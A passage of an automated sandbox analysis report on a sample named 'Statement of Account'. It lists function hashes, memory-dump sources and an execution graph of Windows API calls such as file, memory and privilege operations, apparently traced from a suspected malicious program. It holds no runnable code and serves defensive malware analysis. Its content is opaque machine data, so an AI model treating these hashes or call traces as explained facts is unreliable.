                                                                                                                                                  • Instruction Fuzzy Hash: E011DF76504340DFDB02DF48D5C4B56BF72FB84324F24C2A9D9090B296C33AE45ACBA1
                                                                                                                                                  Function 0139D1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1729492375.000000000139D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0139D000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_139d000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                                                                                  • Instruction ID: 4816f4c638177645ac744a736ab7c0b60d2cf517d2ada2d05d64a7370e28ea50
                                                                                                                                                  • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                                                                                  • Instruction Fuzzy Hash: 3411BB75904280DFDB02CF58C5C4B15BBB2FB84228F24C6ADD8894B296C33AD40ACB61
                                                                                                                                                  Function 0139D017 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1729492375.000000000139D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0139D000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_139d000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                                                                                  • Instruction ID: 881c61dc1eb2bf2cea9c27e73e052e5ceeca2b9fb8421044a5800dc083a393ad
                                                                                                                                                  • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                                                                                  • Instruction Fuzzy Hash: 2D118E75504280DFDB16CF58D5C4B15BB62FB44318F24C6A9D84A4B756C33AD44ACB61

                                                                                                                                                  Non-executed Functions

                                                                                                                                                  Function 07A3A858 Relevance: .4, Instructions: 377COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1735163219.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_7a30000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 83a2ff3c0612da2ad6852a482354b72799a1bdaad3d74fe1ebc10070e245456f
                                                                                                                                                  • Instruction ID: fff676c7f4afde90a6b807a349fccf1d5fbb29c790c0e36eafde5b6313ead2ea
                                                                                                                                                  • Opcode Fuzzy Hash: 83a2ff3c0612da2ad6852a482354b72799a1bdaad3d74fe1ebc10070e245456f
                                                                                                                                                  • Instruction Fuzzy Hash: 42D1BAB17006168FDB15DFB9C510BAEB7F6AF89304F1484ADE1AA9B390CB34E901CB51
                                                                                                                                                  Function 07A31EE8 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1735163219.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_7a30000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 3d1d5b2a56539ad2c931e2c72af7e3e2b4991a546760b8841952a72fb4267f0a
                                                                                                                                                  • Instruction ID: 6ee8d9ab36256071d87e8a91dc51c9363e30a8c8d477032195d349d6f661770b
                                                                                                                                                  • Opcode Fuzzy Hash: 3d1d5b2a56539ad2c931e2c72af7e3e2b4991a546760b8841952a72fb4267f0a
                                                                                                                                                  • Instruction Fuzzy Hash: 52E1E9B4E011198FCB14DFA9C590AAEFBB2FF89304F248169E815AB355D731AD45CFA0
                                                                                                                                                  Function 07A34520 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1735163219.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_7a30000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 7f42bc5eeaad18a5de0745471d378d5522f298e463786f98a31a398828501307
                                                                                                                                                  • Instruction ID: 5b3df7fecb334cb05a52d75e1e1fb8107f1bfc98bcd42b4e2dcf1d95783be9dd
                                                                                                                                                  • Opcode Fuzzy Hash: 7f42bc5eeaad18a5de0745471d378d5522f298e463786f98a31a398828501307
                                                                                                                                                  • Instruction Fuzzy Hash: 2CE10AB4E002598FCB14DFA9C5909AEFBB2FF89305F248169E414AB356D730AD41CFA1
                                                                                                                                                  Function 07A32320 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1735163219.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_7a30000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 7bac675e064ba67ce541370594af28123bbc04c38d06a0f0ee58b44e5b52cd95
                                                                                                                                                  • Instruction ID: cde1c2da7e355488414bb0f73f252ee23eca97a746a733665fd2be25b7741109
                                                                                                                                                  • Opcode Fuzzy Hash: 7bac675e064ba67ce541370594af28123bbc04c38d06a0f0ee58b44e5b52cd95
                                                                                                                                                  • Instruction Fuzzy Hash: 06E1FCB4E012198FDB14DFA9C590AAEFBF2FF89304F248169E415AB355D730A941CFA1
                                                                                                                                                  Function 07A33B20 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1735163219.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_7a30000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 0ec88d8f759afcb66bc5b252f05caf952317b3a8aa9e541f5932e5546a404c64
                                                                                                                                                  • Instruction ID: 170d43e1279ac7d9937226995fbcc74a40dfbe375f372549a59f0f951edc55d1
                                                                                                                                                  • Opcode Fuzzy Hash: 0ec88d8f759afcb66bc5b252f05caf952317b3a8aa9e541f5932e5546a404c64
                                                                                                                                                  • Instruction Fuzzy Hash: E2E1F8B4E051198FCB14DFA9C5909AEFBF2FF89304F248169E815AB355D730A985CFA0
                                                                                                                                                  Function 07A31AB0 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1735163219.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_7a30000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b5dc9296b1bb47749c4ac73d4ba8fe53eac611b326024457561711d8e1d6cfbe
                                                                                                                                                  • Instruction ID: 389239e0fe9df7d072f33fb8ffd3bdae247480cff16f417ee634de2c1223f49e
                                                                                                                                                  • Opcode Fuzzy Hash: b5dc9296b1bb47749c4ac73d4ba8fe53eac611b326024457561711d8e1d6cfbe
                                                                                                                                                  • Instruction Fuzzy Hash: D4E1E9B4E016198FCB14DFA9C5909AEFBF2FF89304F248169E415AB355D731A942CFA0
                                                                                                                                                  Function 013FD384 Relevance: .3, Instructions: 264COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1729675977.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_13f0000_Statement of Account.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 907edde47c0c3d4ae61e44bdb2baba7722268e4b30a732832df60b3aa9a2bef0
                                                                                                                                                  • Instruction ID: d93a12e466776e000fabe56b6f86e8bef38c9250e3c12db0423c5365c8f01698
                                                                                                                                                  • Opcode Fuzzy Hash: 907edde47c0c3d4ae61e44bdb2baba7722268e4b30a732832df60b3aa9a2bef0
                                                                                                                                                  • Instruction Fuzzy Hash: 3EA17136E0021ACFCF15DFB8C84499EBBB6FF85304B15456EEA05AB265DB31E915CB80

                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage:1.4%
                                                                                                                                                  Dynamic/Decrypted Code Coverage:2.7%
                                                                                                                                                  Signature Coverage:5.8%
                                                                                                                                                  Total number of Nodes:548
                                                                                                                                                  Total number of Limit Nodes:69
                                                                                                                                                  execution_graph 96280 41f080 96281 41f08b 96280->96281 96283 41b930 96280->96283 96284 41b956 96283->96284 96291 409d30 96284->96291 96286 41b962 96290 41b983 96286->96290 96299 40c1b0 96286->96299 96288 41b975 96335 41a670 96288->96335 96290->96281 96292 409d3d 96291->96292 96338 409c80 96291->96338 96294 409d44 96292->96294 96350 409c20 96292->96350 96294->96286 96300 40c1d5 96299->96300 96758 40b1b0 96300->96758 96302 40c22c 96762 40ae30 96302->96762 96304 40c252 96334 40c4a3 96304->96334 96771 414390 96304->96771 96306 40c297 96306->96334 96774 408a60 96306->96774 96308 40c2db 96308->96334 96781 41a4c0 96308->96781 96312 40c331 96313 40c338 96312->96313 96793 419fd0 96312->96793 96314 41bd80 2 API calls 96313->96314 96316 40c345 96314->96316 96316->96288 96318 40c382 96319 41bd80 2 API calls 96318->96319 96320 40c389 96319->96320 96320->96288 96321 40c392 96322 40f490 3 API calls 96321->96322 96323 40c406 96322->96323 96323->96313 96324 40c411 96323->96324 96325 41bd80 2 API calls 96324->96325 96326 40c435 96325->96326 96798 41a020 96326->96798 96329 419fd0 2 API calls 96330 40c470 96329->96330 96330->96334 96803 419de0 96330->96803 96333 41a670 2 API calls 96333->96334 96334->96288 96336 41af20 LdrLoadDll 96335->96336 96337 41a68f ExitProcess 96336->96337 96337->96290 96339 409c93 96338->96339 96389 418b80 LdrLoadDll 96338->96389 96369 418a30 96339->96369 96342 409ca6 96342->96292 96343 409c9c 96343->96342 96372 41b270 96343->96372 96345 409ce3 96345->96342 96383 409aa0 96345->96383 96347 409d03 96390 409620 LdrLoadDll 96347->96390 96349 409d15 96349->96292 96351 409c3a 96350->96351 96352 41b560 LdrLoadDll 96350->96352 96733 41b560 96351->96733 96352->96351 96355 41b560 LdrLoadDll 96356 409c61 96355->96356 96357 40f170 96356->96357 96358 40f189 96357->96358 96741 40b030 96358->96741 96360 40f19c 96745 41a1a0 96360->96745 96363 409d55 96363->96286 96365 40f1c2 96366 40f1ed 96365->96366 96751 41a220 96365->96751 96367 41a450 2 API calls 96366->96367 96367->96363 96391 41a5c0 96369->96391 96373 41b289 96372->96373 96404 414a40 96373->96404 96375 41b2a1 96376 41b2aa 96375->96376 96443 41b0b0 96375->96443 96376->96345 96378 41b2be 96378->96376 96461 419ec0 96378->96461 96380 41b2f2 96380->96380 96466 41bd80 96380->96466 96711 407ea0 96383->96711 96385 409ac1 96385->96347 96386 409aba 96386->96385 96724 408160 96386->96724 96389->96339 96390->96349 96394 41af20 96391->96394 96393 418a45 96393->96343 96395 41af30 96394->96395 96396 41af52 96394->96396 96398 414e40 96395->96398 96396->96393 96399 414e4e 96398->96399 96400 414e5a 96398->96400 96399->96400 96403 4152c0 LdrLoadDll 96399->96403 96400->96396 96402 414fac 96402->96396 96403->96402 96405 414d75 96404->96405 96406 414a54 96404->96406 96405->96375 96406->96405 96469 419c10 96406->96469 96409 414b80 96472 41a320 96409->96472 96410 414b63 96529 41a420 LdrLoadDll 96410->96529 96413 414b6d 96413->96375 96414 414ba7 96415 41bd80 2 API calls 96414->96415 96417 414bb3 96415->96417 96416 414d39 96419 41a450 2 API calls 96416->96419 96417->96413 96417->96416 96418 414d4f 96417->96418 96423 414c42 96417->96423 96538 414780 LdrLoadDll NtReadFile NtClose 96418->96538 96420 414d40 96419->96420 96420->96375 96422 414d62 96422->96375 96424 414ca9 96423->96424 96426 414c51 96423->96426 96424->96416 96425 414cbc 96424->96425 96531 41a2a0 96425->96531 96427 414c56 96426->96427 96428 414c6a 96426->96428 96530 414640 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 96427->96530 96431 414c87 96428->96431 96432 414c6f 96428->96432 96431->96420 96487 414400 96431->96487 96475 4146e0 96432->96475 96435 414c60 96435->96375 96437 414d1c 96535 41a450 96437->96535 96438 414c7d 96438->96375 96441 414c9f 96441->96375 96442 414d28 96442->96375 96445 41b0c1 96443->96445 96444 41b0d3 96444->96378 96445->96444 96556 41bd00 96445->96556 96447 41b0f4 96559 414060 96447->96559 96449 41b140 96449->96378 96450 41b117 96450->96449 96451 414060 3 API calls 96450->96451 96453 41b139 96451->96453 96453->96449 96584 415380 96453->96584 96454 41b1ca 96455 41b1da 96454->96455 96678 41aec0 LdrLoadDll 96454->96678 96594 41ad30 96455->96594 96458 41b208 96673 419e80 96458->96673 96462 41af20 LdrLoadDll 96461->96462 96463 419edc 96462->96463 96705 5c82c0a 96463->96705 96464 419ef7 96464->96380 96467 41b319 96466->96467 96708 41a630 96466->96708 96467->96345 96470 414b34 96469->96470 96471 41af20 LdrLoadDll 96469->96471 96470->96409 96470->96410 96470->96413 96471->96470 96473 41a33c NtCreateFile 96472->96473 96474 41af20 LdrLoadDll 96472->96474 96473->96414 96474->96473 96476 4146fc 96475->96476 96477 41a2a0 LdrLoadDll 96476->96477 96478 41471d 96477->96478 96479 414724 96478->96479 96480 414738 96478->96480 96481 41a450 2 API calls 96479->96481 96482 41a450 2 API calls 96480->96482 96483 41472d 96481->96483 96484 414741 96482->96484 96483->96438 96539 41bf90 LdrLoadDll RtlAllocateHeap 96484->96539 96486 41474c 96486->96438 96488 41444b 96487->96488 96489 41447e 96487->96489 96490 41a2a0 LdrLoadDll 96488->96490 96491 4145c9 96489->96491 96495 41449a 96489->96495 96493 414466 96490->96493 96492 41a2a0 LdrLoadDll 96491->96492 96499 4145e4 96492->96499 96494 41a450 2 API calls 96493->96494 96496 41446f 96494->96496 96497 41a2a0 LdrLoadDll 96495->96497 96496->96441 96498 4144b5 96497->96498 96501 4144d1 96498->96501 96502 4144bc 96498->96502 96552 41a2e0 LdrLoadDll 96499->96552 96503 4144d6 96501->96503 96504 4144ec 96501->96504 96506 41a450 2 API calls 96502->96506 96507 41a450 2 API calls 96503->96507 96512 4144f1 96504->96512 96540 41bf50 96504->96540 96505 41461e 96508 41a450 2 API calls 96505->96508 96509 4144c5 96506->96509 96510 4144df 96507->96510 96511 414629 96508->96511 96509->96441 96510->96441 96511->96441 96517 414503 96512->96517 96543 41a3d0 96512->96543 96515 414557 96516 41456e 96515->96516 96551 41a260 LdrLoadDll 96515->96551 96519 414575 96516->96519 96520 41458a 96516->96520 96517->96441 96521 41a450 2 API calls 96519->96521 96522 41a450 2 API calls 96520->96522 96521->96517 96523 414593 96522->96523 96524 4145bf 96523->96524 96546 41bb50 96523->96546 96524->96441 96526 4145aa 96527 41bd80 2 API calls 96526->96527 96528 4145b3 96527->96528 96528->96441 96529->96413 96530->96435 96532 414d04 96531->96532 96533 41af20 LdrLoadDll 96531->96533 96534 41a2e0 LdrLoadDll 96532->96534 96533->96532 96534->96437 96536 41a46c NtClose 96535->96536 96537 41af20 LdrLoadDll 96535->96537 96536->96442 96537->96536 96538->96422 96539->96486 96542 41bf68 96540->96542 96553 41a5f0 96540->96553 96542->96512 96544 41af20 LdrLoadDll 96543->96544 96545 41a3ec NtReadFile 96544->96545 96545->96515 96547 41bb74 96546->96547 96548 41bb5d 96546->96548 96547->96526 96548->96547 96549 41bf50 2 API calls 96548->96549 96550 41bb8b 96549->96550 96550->96526 96551->96516 96552->96505 96554 41af20 LdrLoadDll 96553->96554 96555 41a60c RtlAllocateHeap 96554->96555 96555->96542 96557 41bd2d 96556->96557 96679 41a500 96556->96679 96557->96447 96560 414071 96559->96560 96561 414079 96559->96561 96560->96450 96583 41434c 96561->96583 96682 41cef0 96561->96682 96563 4140cd 96564 41cef0 2 API calls 96563->96564 96567 4140d8 96564->96567 96565 414126 96568 41cef0 2 API calls 96565->96568 96567->96565 96687 41cf90 96567->96687 96569 41413a 96568->96569 96570 41cef0 2 API calls 96569->96570 96572 4141ad 96570->96572 96571 41cef0 2 API calls 96580 4141f5 96571->96580 96572->96571 96574 414324 96694 41cf50 LdrLoadDll RtlFreeHeap 96574->96694 96576 41432e 96695 41cf50 LdrLoadDll RtlFreeHeap 96576->96695 96578 414338 96696 41cf50 LdrLoadDll RtlFreeHeap 96578->96696 96693 41cf50 LdrLoadDll RtlFreeHeap 96580->96693 96581 414342 96697 41cf50 LdrLoadDll RtlFreeHeap 96581->96697 96583->96450 96585 415391 96584->96585 96586 414a40 8 API calls 96585->96586 96587 4153a7 96586->96587 96588 4153e2 96587->96588 96589 4153f5 96587->96589 96593 4153fa 96587->96593 96590 41bd80 2 API calls 96588->96590 96591 41bd80 2 API calls 96589->96591 96592 4153e7 96590->96592 96591->96593 96592->96454 96593->96454 96595 41ad44 96594->96595 96596 41abf0 LdrLoadDll 96594->96596 96698 41abf0 96595->96698 96596->96595 96599 41abf0 LdrLoadDll 96600 41ad56 96599->96600 96601 41abf0 LdrLoadDll 96600->96601 96602 41ad5f 96601->96602 96603 41abf0 LdrLoadDll 96602->96603 96604 41ad68 96603->96604 96605 41abf0 LdrLoadDll 96604->96605 96606 41ad71 96605->96606 96607 41abf0 LdrLoadDll 96606->96607 96608 41ad7d 96607->96608 96609 41abf0 LdrLoadDll 96608->96609 96610 41ad86 96609->96610 96611 41abf0 LdrLoadDll 96610->96611 96612 41ad8f 96611->96612 96613 41abf0 LdrLoadDll 96612->96613 96614 41ad98 96613->96614 96615 41abf0 LdrLoadDll 96614->96615 96616 41ada1 96615->96616 96617 41abf0 LdrLoadDll 96616->96617 96618 41adaa 96617->96618 96619 41abf0 LdrLoadDll 96618->96619 96620 41adb6 96619->96620 96621 41abf0 LdrLoadDll 96620->96621 96622 41adbf 96621->96622 96623 41abf0 LdrLoadDll 96622->96623 96624 41adc8 96623->96624 96625 41abf0 LdrLoadDll 96624->96625 96626 41add1 96625->96626 96627 41abf0 LdrLoadDll 96626->96627 96628 41adda 96627->96628 96629 41abf0 LdrLoadDll 96628->96629 96630 41ade3 96629->96630 96631 41abf0 LdrLoadDll 96630->96631 96632 41adef 96631->96632 96633 41abf0 LdrLoadDll 96632->96633 96634 41adf8 96633->96634 96635 41abf0 LdrLoadDll 96634->96635 96636 41ae01 96635->96636 96637 41abf0 LdrLoadDll 96636->96637 96638 41ae0a 96637->96638 96639 41abf0 LdrLoadDll 96638->96639 96640 41ae13 96639->96640 96641 41abf0 LdrLoadDll 96640->96641 96642 41ae1c 96641->96642 96643 41abf0 LdrLoadDll 96642->96643 96644 41ae28 96643->96644 96645 41abf0 LdrLoadDll 96644->96645 96646 41ae31 96645->96646 96647 41abf0 LdrLoadDll 96646->96647 96648 41ae3a 96647->96648 96649 41abf0 LdrLoadDll 96648->96649 96650 41ae43 96649->96650 96651 41abf0 LdrLoadDll 96650->96651 96652 41ae4c 96651->96652 96653 41abf0 LdrLoadDll 96652->96653 96654 41ae55 96653->96654 96655 41abf0 LdrLoadDll 96654->96655 96656 41ae61 96655->96656 96657 41abf0 LdrLoadDll 96656->96657 96658 41ae6a 96657->96658 96659 41abf0 LdrLoadDll 96658->96659 96660 41ae73 96659->96660 96661 41abf0 LdrLoadDll 96660->96661 96662 41ae7c 96661->96662 96663 41abf0 LdrLoadDll 96662->96663 96664 41ae85 96663->96664 96665 41abf0 LdrLoadDll 96664->96665 96666 41ae8e 96665->96666 96667 41abf0 LdrLoadDll 96666->96667 96668 41ae9a 96667->96668 96669 41abf0 LdrLoadDll 96668->96669 96670 41aea3 96669->96670 96671 41abf0 LdrLoadDll 96670->96671 96672 41aeac 96671->96672 96672->96458 96674 41af20 LdrLoadDll 96673->96674 96675 419e9c 96674->96675 96676 419eb3 96675->96676 96704 5c82df0 LdrInitializeThunk 96675->96704 96676->96378 96678->96455 96680 41a51c NtAllocateVirtualMemory 96679->96680 96681 41af20 LdrLoadDll 96679->96681 96680->96557 96681->96680 96683 41cf00 96682->96683 96684 41cf06 96682->96684 96683->96563 96685 41bf50 2 API calls 96684->96685 96686 41cf2c 96685->96686 96686->96563 96688 41cfb5 96687->96688 96692 41cfed 96687->96692 96689 41bf50 2 API calls 96688->96689 96690 41cfca 96689->96690 96691 41bd80 2 API calls 96690->96691 96691->96692 96692->96567 96693->96574 96694->96576 96695->96578 96696->96581 96697->96583 96699 41ac0b 96698->96699 96700 414e40 LdrLoadDll 96699->96700 96701 41ac2b 96700->96701 96702 414e40 LdrLoadDll 96701->96702 96703 41acd7 96701->96703 96702->96703 96703->96599 96704->96676 96706 5c82c1f LdrInitializeThunk 96705->96706 96707 5c82c11 96705->96707 96706->96464 96707->96464 96709 41af20 LdrLoadDll 96708->96709 96710 41a64c RtlFreeHeap 96709->96710 96710->96467 96712 407eb0 96711->96712 96713 407eab 96711->96713 96714 41bd00 2 API calls 96712->96714 96713->96386 96715 407ed5 96714->96715 96716 407f38 96715->96716 96717 419e80 2 API calls 96715->96717 96718 407f3e 96715->96718 96722 41bd00 2 API calls 96715->96722 96727 41a580 96715->96727 96716->96386 96717->96715 96720 407f64 96718->96720 96721 41a580 2 API calls 96718->96721 96720->96386 96723 407f55 96721->96723 96722->96715 96723->96386 96725 40817e 96724->96725 96726 41a580 2 API calls 96724->96726 96725->96347 96726->96725 96728 41af20 LdrLoadDll 96727->96728 96729 41a59c 96728->96729 96732 5c82c70 LdrInitializeThunk 96729->96732 96730 41a5b3 96730->96715 96732->96730 96734 41b583 96733->96734 96737 40ace0 96734->96737 96738 40ad04 96737->96738 96739 40ad40 LdrLoadDll 96738->96739 96740 409c4b 96738->96740 96739->96740 96740->96355 96742 40b053 96741->96742 96744 40b0d0 96742->96744 96756 419c50 LdrLoadDll 96742->96756 96744->96360 96746 41af20 LdrLoadDll 96745->96746 96747 40f1ab 96746->96747 96747->96363 96748 41a790 96747->96748 96749 41a7af LookupPrivilegeValueW 96748->96749 96750 41af20 LdrLoadDll 96748->96750 96749->96365 96750->96749 96752 41a23c 96751->96752 96753 41af20 LdrLoadDll 96751->96753 96757 5c82ea0 LdrInitializeThunk 96752->96757 96753->96752 96754 41a25b 96754->96366 96756->96744 96757->96754 96759 40b1e0 96758->96759 96760 40b030 LdrLoadDll 96759->96760 96761 40b1f4 96760->96761 96761->96302 96763 40ae41 96762->96763 96764 40ae3d 96762->96764 96765 40ae5a 96763->96765 96766 40ae8c 96763->96766 96764->96304 96808 419c90 LdrLoadDll 96765->96808 96809 419c90 LdrLoadDll 96766->96809 96768 40ae9d 96768->96304 96770 40ae7c 96770->96304 96772 40f490 3 API calls 96771->96772 96773 4143b6 96771->96773 96772->96773 96773->96306 96810 4087a0 96774->96810 96777 408a9d 96777->96308 96778 4087a0 19 API calls 96779 408a8a 96778->96779 96779->96777 96828 40f700 10 API calls 96779->96828 96782 41af20 LdrLoadDll 96781->96782 96783 41a4dc 96782->96783 96948 5c82e80 LdrInitializeThunk 96783->96948 96784 40c312 96786 40f490 96784->96786 96787 40f4ad 96786->96787 96949 419f80 96787->96949 96790 40f4f5 96790->96312 96791 419fd0 2 API calls 96792 40f51e 96791->96792 96792->96312 96794 41af20 LdrLoadDll 96793->96794 96795 419fec 96794->96795 96955 5c82d10 LdrInitializeThunk 96795->96955 96796 40c375 96796->96318 96796->96321 96799 41af20 LdrLoadDll 96798->96799 96800 41a03c 96799->96800 96956 5c82d30 LdrInitializeThunk 96800->96956 96801 40c449 96801->96329 96804 41af20 LdrLoadDll 96803->96804 96805 419dfc 96804->96805 96957 5c82fb0 LdrInitializeThunk 96805->96957 96806 40c49c 96806->96333 96808->96770 96809->96768 96811 407ea0 4 API calls 96810->96811 96826 4087ba 96811->96826 96812 408a49 96812->96777 96812->96778 96813 408a3f 96814 408160 2 API calls 96813->96814 96814->96812 96817 419ec0 2 API calls 96817->96826 96819 41a450 LdrLoadDll NtClose 96819->96826 96822 40c4b0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 96822->96826 96825 419de0 2 API calls 96825->96826 96826->96812 96826->96813 96826->96817 96826->96819 96826->96822 96826->96825 96829 419cd0 96826->96829 96832 4085d0 96826->96832 96844 40f5e0 LdrLoadDll NtClose 96826->96844 96845 419d50 LdrLoadDll 96826->96845 96846 419d80 LdrLoadDll 96826->96846 96847 419e10 LdrLoadDll 96826->96847 96848 4083a0 96826->96848 96864 405f60 LdrLoadDll 96826->96864 96828->96777 96830 41af20 LdrLoadDll 96829->96830 96831 419cec 96830->96831 96831->96826 96833 4085e6 96832->96833 96865 419840 96833->96865 96835 4085ff 96840 408771 96835->96840 96886 4081a0 96835->96886 96837 4086e5 96838 4083a0 11 API calls 96837->96838 96837->96840 96839 408713 96838->96839 96839->96840 96841 419ec0 2 API calls 96839->96841 96840->96826 96842 408748 96841->96842 96842->96840 96843 41a4c0 2 API calls 96842->96843 96843->96840 96844->96826 96845->96826 96846->96826 96847->96826 96849 4083c9 96848->96849 96927 408310 96849->96927 96852 41a4c0 2 API calls 96853 4083dc 96852->96853 96853->96852 96854 408467 96853->96854 96857 408462 96853->96857 96935 40f660 96853->96935 96854->96826 96855 41a450 2 API calls 96856 40849a 96855->96856 96856->96854 96858 419cd0 LdrLoadDll 96856->96858 96857->96855 96859 4084ff 96858->96859 96859->96854 96939 419d10 96859->96939 96861 408563 96861->96854 96862 414a40 8 API calls 96861->96862 96863 4085b8 96862->96863 96863->96826 96864->96826 96866 41bf50 2 API calls 96865->96866 96867 419857 96866->96867 96893 409310 96867->96893 96869 419872 96870 4198b0 96869->96870 96871 419899 96869->96871 96874 41bd00 2 API calls 96870->96874 96872 41bd80 2 API calls 96871->96872 96873 4198a6 96872->96873 96873->96835 96875 4198ea 96874->96875 96876 41bd00 2 API calls 96875->96876 96877 419903 96876->96877 96883 419ba4 96877->96883 96899 41bd40 96877->96899 96880 419b90 96881 41bd80 2 API calls 96880->96881 96882 419b9a 96881->96882 96882->96835 96884 41bd80 2 API calls 96883->96884 96885 419bf9 96884->96885 96885->96835 96887 40829f 96886->96887 96888 4081b5 96886->96888 96887->96837 96888->96887 96889 414a40 8 API calls 96888->96889 96890 408222 96889->96890 96891 41bd80 2 API calls 96890->96891 96892 408249 96890->96892 96891->96892 96892->96837 96894 409335 96893->96894 96895 40ace0 LdrLoadDll 96894->96895 96896 409368 96895->96896 96898 40938d 96896->96898 96902 40cf10 96896->96902 96898->96869 96920 41a540 96899->96920 96903 40cf3c 96902->96903 96904 41a1a0 LdrLoadDll 96903->96904 96905 40cf55 96904->96905 96906 40cf5c 96905->96906 96913 41a1e0 96905->96913 96906->96898 96910 40cf97 96911 41a450 2 API calls 96910->96911 96912 40cfba 96911->96912 96912->96898 96914 41a1fc 96913->96914 96915 41af20 LdrLoadDll 96913->96915 96919 5c82ca0 LdrInitializeThunk 96914->96919 96915->96914 96916 40cf7f 96916->96906 96918 41a7d0 LdrLoadDll 96916->96918 96918->96910 96919->96916 96921 41a549 96920->96921 96922 41af20 LdrLoadDll 96921->96922 96923 41a55c 96922->96923 96926 5c82f90 LdrInitializeThunk 96923->96926 96924 419b89 96924->96880 96924->96883 96926->96924 96928 40831e 96927->96928 96929 40ace0 LdrLoadDll 96928->96929 96930 408343 96929->96930 96931 414e40 LdrLoadDll 96930->96931 96932 408353 96931->96932 96933 40835c PostThreadMessageW 96932->96933 96934 408370 96932->96934 96933->96934 96934->96853 96936 40f673 96935->96936 96942 419e50 96936->96942 96940 419d2c 96939->96940 96941 41af20 LdrLoadDll 96939->96941 96940->96861 96941->96940 96943 419e6c 96942->96943 96944 41af20 LdrLoadDll 96942->96944 96947 5c82dd0 LdrInitializeThunk 96943->96947 96944->96943 96945 40f69e 96945->96853 96947->96945 96948->96784 96950 419f9c 96949->96950 